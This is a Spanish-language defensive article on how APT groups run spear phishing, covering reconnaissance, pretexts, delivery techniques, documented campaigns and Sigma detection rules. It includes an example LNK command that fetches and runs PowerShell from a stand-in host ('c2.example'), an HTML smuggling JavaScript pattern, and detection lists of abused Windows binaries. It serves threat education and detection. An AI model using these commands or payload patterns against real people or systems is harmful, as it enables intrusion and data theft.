Spear Phishing en APTs: Técnicas Avanzadas de Reconnaissance y Targeting

Por qué los APTs siguen ganando con un email

El spear phishing es el vector de acceso inicial más utilizado por grupos APT. No por falta de alternativas (explotan zero-days, comprometen supply chains, atacan VPNs), sino porque funciona. Mandiant reporta que en más del 40% de las intrusiones APT documentadas entre 2023 y 2025, el punto de entrada fue un email dirigido a una persona concreta.

La diferencia entre el phishing masivo y el spear phishing APT no es de grado, es de naturaleza. Un phishing masivo lanza 100.000 emails genéricos esperando que un 0,1% haga clic. Un APT invierte días o semanas investigando a una sola persona, construye un pretexto creíble basado en información real, y diseña un payload específico para evadir los controles de esa organización.

Este artículo recorre las tres fases del spear phishing APT (reconnaissance, pretexting, delivery), documenta campañas reales de APT28, Kimsuky, Lazarus y Scattered Spider, y proporciona reglas de detección concretas.

Spear phishing vs phishing masivo

Antes de entrar en técnicas APT, conviene clarificar las diferencias fundamentales:

Dimensión	Phishing masivo	Spear phishing APT
Targeting	Miles o millones de destinatarios	1 a 10 individuos seleccionados
Investigación previa	Ninguna o mínima	Días a semanas de OSINT
Personalización	Genérica ("Estimado usuario")	Referencia proyectos reales, jefes, eventos
Payload	Kit genérico (credential harvesting)	Custom, diseñado contra los controles del target
Infraestructura	Dominios baratos, hosting compartido	Dominios typosquatted, certificados válidos, servicios legítimos
Tasa de éxito	0,1% a 3%	30% a 70% contra targets sin awareness específico
Atribución	Grupos criminales genéricos	APTs con respaldo estatal o grupos sofisticados
Objetivo	Credenciales, tarjetas, crypto	Acceso persistente, espionaje, sabotaje

El spear phishing APT es una operación de inteligencia disfrazada de email. Cada componente (remitente, asunto, cuerpo, adjunto, timing) está optimizado para una persona concreta.

Fase 1: Reconnaissance OSINT

La calidad del spear phishing depende directamente de la calidad del reconnaissance. Los APTs usan fuentes OSINT (Open Source Intelligence) que cualquiera puede consultar, pero las explotan con metodología y paciencia.

LinkedIn: la mina de oro

LinkedIn es, sin exageración, la fuente más valiosa para un atacante que prepara spear phishing. De un solo perfil se puede extraer:

• Nombre completo y cargo exacto. Permite construir la línea de remitente.
• Cadena de mando. La sección "People also viewed" y la página de empresa revelan quién reporta a quién.
• Stack tecnológico. Las skills y endorsements delatan qué software usa la organización. Si un administrador de sistemas lista "Palo Alto Networks" y "CrowdStrike", el atacante sabe qué evadir.
• Actividad reciente. Posts, artículos, reacciones. Si el target publicó sobre una conferencia o un proyecto, el pretexto se escribe solo.
• Cambios de empleo. Un empleado recién incorporado es un target ideal: no conoce los procesos internos, tiene prisa por demostrar, y es más probable que abra adjuntos "de RRHH".

APT29 (Cozy Bear) ha utilizado LinkedIn de forma sistemática para identificar diplomáticos europeos. Kimsuky ha enviado mensajes directos por LinkedIn haciéndose pasar por investigadores académicos.

Conferencias y publicaciones

Los grupos APT monitorizan conferencias sectoriales para identificar targets:

• Ponentes. Su nombre, tema y afiliación son públicos. Un email que referencia la conferencia ("Vi tu presentación sobre X, quería compartir un paper relacionado") tiene alta credibilidad.
• Asistentes. Algunas conferencias publican listas de asistentes. Otras tienen hashtags oficiales en redes sociales donde los asistentes se identifican.
• Papers y artículos técnicos. Si el target ha publicado investigación, el atacante puede enviar un "paper complementario" como adjunto malicioso.

Kimsuky (DPRK) ha usado esta técnica repetidamente contra investigadores de think tanks, enviando PDFs que aparentan ser borradores de papers académicos.

Estructura organizacional

Con LinkedIn, la web corporativa y documentos públicos (memorias anuales, registros mercantiles), un APT reconstruye el organigrama parcial del target:

• Quién puede enviar emails que el target abra sin dudar: su jefe directo, RRHH, IT support, un proveedor habitual.
• Qué departamento es más vulnerable: los equipos de comunicación, marketing y ventas reciben adjuntos de desconocidos como parte de su trabajo legítimo.
• Nombres internos de proyectos. A veces aparecen en ofertas de empleo, presentaciones públicas o filtraciones previas.

Stack tecnológico

El reconnaissance técnico determina qué payload funcionará:

• MX records y SPF/DKIM/DMARC. Un dig mx target.com revela si usan Google Workspace, Microsoft 365 o un servidor on-premise. Un DMARC en p=none (solo monitorización) indica que el spoofing pasará los filtros.
• Tecnologías web. Wappalyzer, BuiltWith y las cabeceras HTTP revelan el stack frontend/backend. Pero lo relevante para phishing es el stack de email y seguridad.
• Ofertas de empleo. "Buscamos analista con experiencia en Proofpoint y Splunk" revela los controles de seguridad exactos.
• Certificados SSL. crt.sh muestra subdominios (vpn.target.com, mail.target.com, owa.target.com), lo que sugiere qué servicios exponen.

Fase 2: Pretexting (construir la historia)

El pretexto es la narrativa que justifica el email. Un buen pretexto tiene cuatro propiedades:

1. Relevancia. Conecta con el trabajo real del target. No es un paquete de FedEx para un analista de CTI; es un IOC report de un proveedor de threat intelligence.
2. Urgencia calibrada. No "su cuenta será suspendida en 2 horas" (demasiado agresivo, activa sospechas). Más bien "necesitamos tu feedback antes del viernes para cerrar el informe".
3. Autoridad. Viene de alguien que el target respeta o teme: un superior, un regulador, un partner de negocio.
4. Acción natural. Lo que se pide (abrir un documento, hacer clic en un enlace) es algo que el target haría normalmente en su trabajo.

Pretextos documentados en campañas APT

Grupo	Pretexto	Target	Año
APT28	Invitación a conferencia de energía con agenda en PDF	Sector energético EU	2023
Kimsuky	Borrador de paper académico para revisión por pares	Investigadores de think tanks	2023-2025
Lazarus	Oferta de empleo de empresa crypto con job description en DOCX	Desarrolladores blockchain	2022-2024
Scattered Spider	Llamada de helpdesk IT pidiendo reset de MFA	Empleados de telcos y casinos	2023
APT29	Nota diplomática con "cambios en protocolo" adjuntos	Embajadas europeas	2024
Charming Kitten	Invitación a webinar con enlace de registro falso	Periodistas y activistas	2023-2025

Los pretextos evolucionan con la actualidad. Durante el COVID, los APTs usaron pretextos sanitarios. Tras la invasión de Ucrania, APT28 usó pretextos relacionados con sanciones y política energética.

Fase 3: evolución del payload delivery

Los mecanismos de entrega de payload han evolucionado dramáticamente en los últimos años, impulsados por los controles de seguridad que Microsoft y otros vendors han implementado.

Línea temporal de técnicas de delivery

Periodo	Técnica	Cómo funciona	Estado en 2026
2015-2022	Macros Office (VBA)	Documento con macro que ejecuta PowerShell al abrir	Bloqueada por defecto (MOTW, julio 2022)
2021-2023	ISO/IMG containers	Imagen de disco que evita Mark-of-the-Web	Parcheada (Windows 11 22H2 propaga MOTW a contenido)
2022-2023	OneNote malicioso	Adjuntos .one con scripts embebidos bajo botones falsos	Bloqueada (Microsoft restringe extensiones embebidas)
2022-2026	HTML smuggling	HTML que construye el payload en JavaScript del lado del cliente	Activa. Difícil de detectar por proxies
2023-2026	LNK + PowerShell	Acceso directo que ejecuta PowerShell ofuscado	Activa. Requiere ingeniería social para la ejecución
2024-2026	Cloud-hosted payloads	Payload en OneDrive/SharePoint/Google Drive legítimo	Activa. Los dominios son trusted por naturaleza
2025-2026	Abuso de ClickOnce y MSIX	Instaladores firmados con certificados robados	Emergente

Macros Office: historia y bloqueo

Durante casi una década, las macros VBA en documentos Word y Excel fueron el vector dominante. El flujo era simple:

1. El target recibe un DOCX/XLSM con una macro.
2. Office muestra "Enable Content" si la macro está deshabilitada.
3. El usuario hace clic. La macro ejecuta PowerShell que descarga el stage 2.

Microsoft cambió las reglas en julio de 2022: los documentos descargados de Internet (marcados con Mark-of-the-Web/MOTW) ya no permiten habilitar macros. El botón "Enable Content" desapareció para estos archivos.

Este cambio forzó a los APTs a buscar alternativas. No eliminó el vector (documentos compartidos internamente o desde SharePoint corporativo no llevan MOTW), pero redujo drásticamente su efectividad contra targets externos.

ISO/IMG containers

La primera alternativa masiva tras el bloqueo de macros fue empaquetar el payload en archivos ISO o IMG. En Windows, un doble clic en un ISO lo monta como unidad virtual. Los archivos dentro de la imagen montada no heredaban el flag MOTW, evitando así las restricciones de macros y SmartScreen.

Contenido típico de un ISO malicioso:

malicious.iso/
├── Document.lnk          ← acceso directo visible (icono de PDF)
├── payload.dll            ← DLL maliciosa (oculta)
└── data.pdf               ← señuelo legítimo (oculto)

El usuario ve solo "Document.lnk" con icono de PDF. Al hacer doble clic, el LNK ejecuta rundll32.exe payload.dll,DllMain y abre el PDF señuelo para mantener la ilusión.

Microsoft parcheó esta técnica en noviembre de 2022, propagando MOTW a los archivos dentro de ISOs montados. Aun así, algunas variantes siguen funcionando en sistemas sin parchear.

HTML smuggling: la técnica que persiste

HTML smuggling es la técnica de delivery más resiliente actualmente. Funciona así:

1. El target recibe un email con un archivo HTML adjunto (o un enlace a una página HTML).
2. El HTML contiene JavaScript que decodifica un payload codificado en Base64 (o construido byte a byte).
3. Al abrir el HTML en el navegador, el JavaScript crea un Blob y fuerza la descarga de un archivo (ZIP, ISO, EXE).
4. El archivo "descargado" no viene de Internet desde la perspectiva del proxy o el gateway de email; se construyó localmente en el navegador.

Ejemplo simplificado (con fines defensivos) del patrón JavaScript:

// Patrón típico de HTML smuggling (simplificado)
var encoded = "UEsDBBQAAAA...";  // payload en Base64
var decoded = atob(encoded);
var bytes = new Uint8Array(decoded.length);
for (var i = 0; i < decoded.length; i++) {
    bytes[i] = decoded.charCodeAt(i);
}
var blob = new Blob([bytes], {type: "application/octet-stream"});
var url = URL.createObjectURL(blob);
var a = document.createElement("a");
a.href = url;
a.download = "Report_Q3_2026.zip";
a.click();

Lo que hace esta técnica particularmente peligrosa:

• Evade gateways de email. El adjunto es un HTML legítimo, no un ejecutable. Muchos gateways permiten HTML.
• Evade proxies web. El payload se construye en el navegador del cliente, no se descarga de un servidor externo.
• MOTW limitada. Dependiendo del navegador y la implementación, el archivo generado puede no recibir MOTW correctamente.

APT29 (Nobelium) usó HTML smuggling extensivamente en sus campañas contra entidades diplomáticas europeas en 2024. Kimsuky ha empleado variantes con ofuscación adicional del JavaScript.

OneNote: scripts bajo botones falsos

Tras el bloqueo de macros, Microsoft OneNote se convirtió brevemente en vector popular. Los archivos .one permiten embeber casi cualquier tipo de archivo. Los atacantes embebían scripts (BAT, VBS, PowerShell) bajo una imagen que decía "Double click to view document".

Microsoft respondió en abril de 2023 bloqueando la ejecución de extensiones peligrosas embebidas en OneNote. La ventana de explotación duró menos de un año, pero fue prolífica.

LNK + PowerShell

Los archivos de acceso directo (.lnk) pueden ejecutar comandos arbitrarios. Un LNK malicioso típico contiene:

Target: C:\Windows\System32\cmd.exe /c powershell -w hidden -ep bypass
        -c "IEX(New-Object Net.WebClient).DownloadString('https://c2.example/s')"
Icon: %SystemRoot%\System32\shell32.dll,1  (icono de carpeta o PDF)

El usuario ve un icono familiar. Al hacer doble clic, cmd.exe lanza PowerShell en modo oculto que descarga y ejecuta el stage 2. Esta técnica sigue activa porque los LNK son archivos legítimos de Windows y difíciles de bloquear sin romper funcionalidad.

Cloud-hosted payloads

La tendencia más reciente es alojar payloads en servicios cloud legítimos:

• OneDrive/SharePoint. El enlace viene de *.sharepoint.com, un dominio trusted por cualquier filtro.
• Google Drive. URLs de drive.google.com con archivos compartidos que contienen el payload.
• Dropbox, AWS S3, Azure Blob. Dominios corporativos legítimos que los proxies no bloquean.

El email no contiene adjunto; solo un enlace a un servicio legítimo. El payload real está en la nube, donde es más difícil de escanear por los gateways de email corporativos.

Campañas documentadas

APT28 (Fancy Bear): sector energético europeo

En Q3-Q4 de 2023, APT28 (GRU, Rusia) ejecutó una campaña de spear phishing contra organizaciones del sector energético en Francia, Alemania y Polonia. El contexto geopolítico (crisis energética post-invasión de Ucrania) hizo los pretextos especialmente creíbles.

• Reconnaissance: Identificación de directivos de energéticas mediante LinkedIn y ponencias en foros como la European Utility Week.
• Pretexto: Invitaciones a conferencias sobre "transición energética EU" con agenda adjunta en PDF.
• Delivery: HTML smuggling que generaba un archivo ZIP conteniendo un LNK + DLL de Headlace (backdoor custom de APT28).
• Persistencia: Scheduled task que ejecutaba el backdoor al inicio de sesión.
• MITRE ATT&CK: T1566.001 (Spearphishing Attachment), T1027.006 (HTML Smuggling), T1059.001 (PowerShell), T1053.005 (Scheduled Task).

Kimsuky: targeting académico

Kimsuky (DPRK) mantiene campañas persistentes contra investigadores académicos y analistas de think tanks especializados en la península coreana. Su operativa es metódica:

1. Primer contacto legítimo. Un email sin payload, presentándose como investigador de una universidad real, pidiendo opinión sobre un tema.
2. Construcción de confianza. Intercambio de 2 a 5 emails legítimos durante semanas. El atacante demuestra conocimiento del campo.
3. Payload delivery. Tras establecer rapport, envía un "borrador de paper" en formato DOCX con macro (para targets que usan Office antiguo) o un enlace a Google Drive con un archivo ZIP.
4. Objetivo. Robo de credenciales de email y documentos de investigación no publicada.

Lo notable de Kimsuky es la paciencia: invierten semanas en un solo target antes de enviar el payload.

Lazarus: desarrolladores crypto

Lazarus (RGB, DPRK) ha ejecutado múltiples campañas contra desarrolladores de plataformas de criptomonedas, con el objetivo de robar claves privadas y fondos. La operación "Dream Job" es su plantilla:

• Pretexto: Reclutador de empresa crypto (Coinbase, Binance, Crypto.com) contacta al desarrollador con una oferta laboral atractiva.
• Canal: LinkedIn InMail o email directo.
• Delivery: "Job description" en PDF (con exploit) o un "coding test" que es un proyecto Node.js/Python con dependencias maliciosas.
• Impacto financiero: Más de 1.500 millones USD robados en criptomonedas entre 2022 y 2025 mediante variantes de esta técnica.

Scattered Spider: vishing + helpdesk

Scattered Spider (UNC3944) añadió una capa que los APTs estatales rara vez usan: vishing (phishing por voz). Su técnica contra casinos y telecomunicaciones:

1. OSINT. Identifican empleados de soporte IT mediante LinkedIn.
2. Llamada telefónica. Se hacen pasar por un empleado legítimo que necesita resetear su MFA.
3. Ingeniería social al helpdesk. Proporcionan datos personales del empleado suplantado (obtenidos de breaches anteriores) para pasar la verificación.
4. Acceso. Con las credenciales reseteadas, acceden a la VPN corporativa y escalan privilegios.

No es spear phishing por email estrictamente, pero demuestra que el vector humano se adapta al canal más efectivo.

Cadena de infección típica

La mayoría de campañas APT de spear phishing siguen una cadena predecible:

[1] Email + Pretexto personalizado
         │
         ▼
[2] Payload Delivery
    ├── HTML smuggling → ZIP/ISO descargado
    ├── Adjunto directo (PDF exploit, DOCX, LNK)
    └── Enlace a cloud legítimo (OneDrive, GDrive)
         │
         ▼
[3] Ejecución inicial
    ├── LNK → cmd.exe → PowerShell
    ├── DLL sideloading (rundll32)
    └── Script (VBS, JS, BAT)
         │
         ▼
[4] Stage 2 download
    └── PowerShell/curl descarga backdoor desde C2
         │
         ▼
[5] Persistencia
    ├── Scheduled Task / Registry Run key
    ├── COM hijacking
    └── WMI subscription
         │
         ▼
[6] C2 + Operaciones
    ├── Exfiltración de datos
    ├── Movimiento lateral
    └── Acceso persistente (meses/años)

Cada eslabón de la cadena es una oportunidad de detección. La clave es no depender solo del gateway de email (eslabón 1), sino tener visibilidad en todos los puntos.

Detección técnica

Reglas Sigma para procesos hijos de Office

Una de las señales más fiables de un documento malicioso es que un proceso de Office lance procesos hijos inusuales. Word no debería lanzar PowerShell, cmd.exe ni mshta.exe.

title: Suspicious Office Child Process
id: d1234567-spear-phishing-apt
status: stable
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\WINWORD.EXE'
            - '\EXCEL.EXE'
            - '\POWERPNT.EXE'
            - '\ONENOTE.EXE'
            - '\OUTLOOK.EXE'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\mshta.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\rundll32.exe'
            - '\regsvr32.exe'
            - '\certutil.exe'
            - '\bitsadmin.exe'
    condition: selection_parent and selection_child
    level: high
    tags:
        - attack.execution
        - attack.t1059
        - attack.t1204.002

Detección de HTML smuggling

Patrones a monitorizar en el gateway de email y en el endpoint:

title: HTML Smuggling Indicators
id: e2345678-html-smuggling-detect
detection:
    # En el gateway de email: HTML adjunto con JavaScript sospechoso
    email_attachment:
        AttachmentExtension: '.html'
        AttachmentContent|contains|any:
            - 'atob('
            - 'Uint8Array'
            - 'createObjectURL'
            - 'application/octet-stream'
            - 'msSaveOrOpenBlob'

    # En el endpoint: archivo descargado desde navegador a Downloads
    endpoint_download:
        ProcessName|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\firefox.exe'
        TargetFilePath|endswith|any:
            - '.zip'
            - '.iso'
            - '.img'
            - '.exe'
        TargetFilePath|contains: '\Downloads\'
    condition: email_attachment or endpoint_download
    level: medium

Indicadores de LNK malicioso

title: Suspicious LNK Execution
detection:
    selection:
        CommandLine|contains|any:
            - 'powershell'
            - 'cmd.exe /c'
            - 'mshta'
            - 'wscript'
            - 'cscript'
        ParentCommandLine|contains: '.lnk'
    condition: selection
    level: high

Defensa contra spear phishing APT

La defensa efectiva opera en capas. Ninguna medida individual es suficiente contra un APT con recursos y motivación.

Capa 1: reducción de superficie OSINT

• Auditar la exposición en LinkedIn. Los empleados de alto riesgo (C-level, finanzas, IT admin, research) deberían limitar la información visible a conexiones directas.
• Eliminar metadata de documentos públicos. Herramientas como exiftool revelan nombres de usuario, rutas internas y versiones de software en PDFs y DOCX publicados.
• Revisar ofertas de empleo. No publicar el stack de seguridad ("Experiencia en CrowdStrike Falcon y Palo Alto Cortex XDR requerida") es revelar las defensas al adversario.

Capa 2: controles técnicos de email

• DMARC en p=reject. No p=none ni p=quarantine. Reject impide que los emails spoofed lleguen al buzón.
• Sandbox de adjuntos. Detonar HTML, PDF, Office y ZIP en sandbox antes de entregar al usuario. Buscar patrones de HTML smuggling en el JavaScript.
• Restricción de tipos de adjunto. Bloquear ISO, IMG, VHD, LNK, CHM, OneNote (.one) en el gateway de email.
• URL rewriting y time-of-click analysis. Los enlaces a OneDrive o Google Drive pueden ser legítimos al envío y maliciosos al clic (el atacante sube el payload después de que el email pase el filtro).

Capa 3: detección en endpoint

• Monitorizar procesos hijos de Office. Las reglas Sigma anteriores son un mínimo. Cualquier EDR moderno debería alertar cuando Word lanza PowerShell.
• Controlar ejecución desde Downloads. Un ejecutable o script lanzado desde la carpeta Downloads es sospechoso por definición.
• ASR rules (Microsoft Defender). Las Attack Surface Reduction rules bloquean comportamientos como "Office application creating child processes" o "Office application creating executable content".
• Application whitelisting. Políticas que restrinjan qué ejecutables pueden correr desde directorios temporales y de usuario.

Capa 4: factor humano

• Awareness específico para targets de alto valor. No el mismo training genérico para todos. Los ejecutivos, los equipos de finanzas y los administradores de sistemas necesitan formación adaptada a los pretextos que recibirán.
• Simulacros de spear phishing. Campañas internas que repliquen las técnicas APT documentadas (no el phishing genérico de "paquete de Amazon").
• Cultura de reporte. El empleado que reporta un email sospechoso (aunque sea legítimo) debe recibir feedback positivo, no reproche.
• Verificación out-of-band. Ante cualquier solicitud inusual por email (transferencia, cambio de cuenta, reset de MFA), verificar por un canal diferente (llamada, Teams, presencial).

Recursos y referencias

Fuentes primarias

• MITRE ATT&CK T1566 (Phishing) y sub-técnicas T1566.001 (Attachment), T1566.002 (Link), T1566.003 (Spearphishing via Service).
• Mandiant M-Trends 2025. Estadísticas de vectores de acceso inicial.
• Microsoft Threat Intelligence. Documentación del bloqueo de macros por defecto y Mark-of-the-Web propagation.
• Proofpoint TA453 / TA427 reports. Campañas de Charming Kitten y Kimsuky respectivamente.
• CrowdStrike Overwatch reports. Documentación de Scattered Spider (SCATTERED SPIDER) y Labyrinth Chollima (Lazarus).

Herramientas defensivas

Herramienta	Uso
oletools	Análisis de macros VBA en documentos Office
olevba	Extracción de código VBA para análisis estático
rtfobj	Detección de objetos embebidos en RTF
html-smuggling-detect	Scripts de detección de patrones HTML smuggling
exiftool	Auditoría de metadata en documentos publicados
YARA	Reglas para identificar familias de dropper/loader en adjuntos
ANY.RUN / Triage	Sandbox online para detonación segura de adjuntos

Reglas y detecciones

• SigmaHQ. Repositorio de reglas Sigma para detección de técnicas de ejecución post-phishing.
• Elastic Detection Rules. Reglas específicas para HTML smuggling y Office child processes.
• Splunk Security Content. Detecciones para PowerShell encoded commands y LNK execution.

La realidad del spear phishing APT es que no se puede eliminar el riesgo, solo reducirlo. Los APTs con recursos estatales siempre encontrarán la siguiente técnica de delivery cuando la actual sea bloqueada. La defensa efectiva combina controles técnicos en profundidad con un factor humano entrenado para reconocer que el email más peligroso es el que parece más legítimo.